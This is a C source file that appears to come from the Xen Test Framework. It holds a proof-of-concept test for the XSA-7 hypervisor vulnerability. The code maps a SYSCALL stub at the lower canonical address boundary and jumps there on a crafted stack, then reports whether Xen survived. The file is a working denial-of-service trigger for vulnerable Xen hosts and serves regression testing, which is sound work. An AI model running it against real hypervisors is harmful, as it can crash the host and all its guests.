main.c

Go to the documentation of this file.

 
#include <xtf.h>
 
const char test_title[] = "XSA-7 PoC";
 
void stub(void);
 
/*
 * A page to be mapped at the lower canonical boundary.  The attack needs a
 * SYSCALL instruction at the end.  The rest may be used as a stack by Xen,
 * including a top-of-stack block.  Poison with 0xcc to to make the pointers
 * in the top-of-stack block be non-canonical.
 */
asm (".align 4096;"
     ".skip 4096 - (.L_page_end - stub), 0xcc;"
 
     "stub: "
     "    syscall;"
     ".L_page_end:"
 
     _ASM_EXTABLE_HANDLER(0x0000800000000000, .L_stub_done, ex_gp)
    );
 
bool ex_gp(struct cpu_regs *regs, const struct extable_entry *ex)
{
    if ( regs->entry_vector == X86_EXC_GP && regs->error_code == 0 )
    {
        regs->_rsp = regs->rdx; /* Restore %rsp from the xchg */
        regs->ip = ex->fixup;
 
        return true;
    }
 
    return false;
}
 
void test_main(void)
{
    static intpte_t l3t[L1_PT_ENTRIES] __page_aligned_bss;
    static intpte_t l2t[L2_PT_ENTRIES] __page_aligned_bss;
    static intpte_t l1t[L3_PT_ENTRIES] __page_aligned_bss;
 
    intpte_t *l4t = _p(pv_start_info->pt_base);
    int rc;
 
    /* Map the page containing stub_fn at the lower canonical boundary. */
    l1t[511] = pte_from_virt(stub, PF_SYM(AD, RW, P));
    l2t[511] = pte_from_virt(l1t,  PF_SYM(AD, RW, P));
    l3t[511] = pte_from_virt(l2t,  PF_SYM(AD, RW, P));
 
    if ( hypercall_update_va_mapping(
             _u(l1t), pte_from_virt(l1t, PF_SYM(AD, P)), 0) )
        return xtf_error("Error: Can't remap l1t as R/O\n");
    if ( hypercall_update_va_mapping(
             _u(l2t), pte_from_virt(l2t, PF_SYM(AD, P)), 0) )
        return xtf_error("Error: Can't remap l2t as R/O\n");
    if ( hypercall_update_va_mapping(
             _u(l3t), pte_from_virt(l3t, PF_SYM(AD, P)), 0) )
        return xtf_error("Error: Can't remap l3t as R/O\n");
 
    mmu_update_t mu[] = {
        {
            .ptr = virt_to_maddr(&l4t[255]),
            .val = pte_from_virt(l3t, PF_SYM(AD, RW, P)),
        },
    };
 
    rc = hypercall_mmu_update(mu, ARRAY_SIZE(mu), NULL, DOMID_SELF);
    if ( rc )
        return xtf_error("Error: mapping buffer failed: %d\n", rc);
 
    /*
     * The attack run uses SYSCALL, so executes one hypercall before getting
     * into trouble.  Use XENVER_version for speed and to avoid side effects.
     *
     * Load the bad stack by XCHG-ing %rsp, so ex_gp() can recover the good
     * stack.  Then jump to stub()'s alias beside the low canonincal boundary.
     */
    register unsigned long r11 asm ("r11");
    unsigned long tmp;
    asm volatile (
        "    xchg %[stk], %%rsp;"
        "    jmp *%[stub];"
        ".L_stub_done:"
        : "=a" (tmp), "=D" (tmp), "=S" (tmp), /* Hypercall clobbers */
          "=c" (tmp), "=r" (r11),             /* SYSCALL clobbers */
          [stk] "=&d" (tmp)                   /* XCHG clobber */
        : "a" (__HYPERVISOR_xen_version),
          "D" (XENVER_version),
          "S" (NULL),
          [stub] "r" (_p(0x00007ffffffff000ULL) + (_u(stub) & ~PAGE_MASK)),
          "[stk]" (0x00007fffffffff00UL)
        );
 
    /*
     * If we're still alive, Xen didn't crash, and ex_gp() (registered by the
     * non-canonical %rip) did trigger and fix up properly.
     */
    xtf_success("Success: Not vulnerble to XSA-7\n");
}
 
/*
 * Local variables:
 * mode: C
 * c-file-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */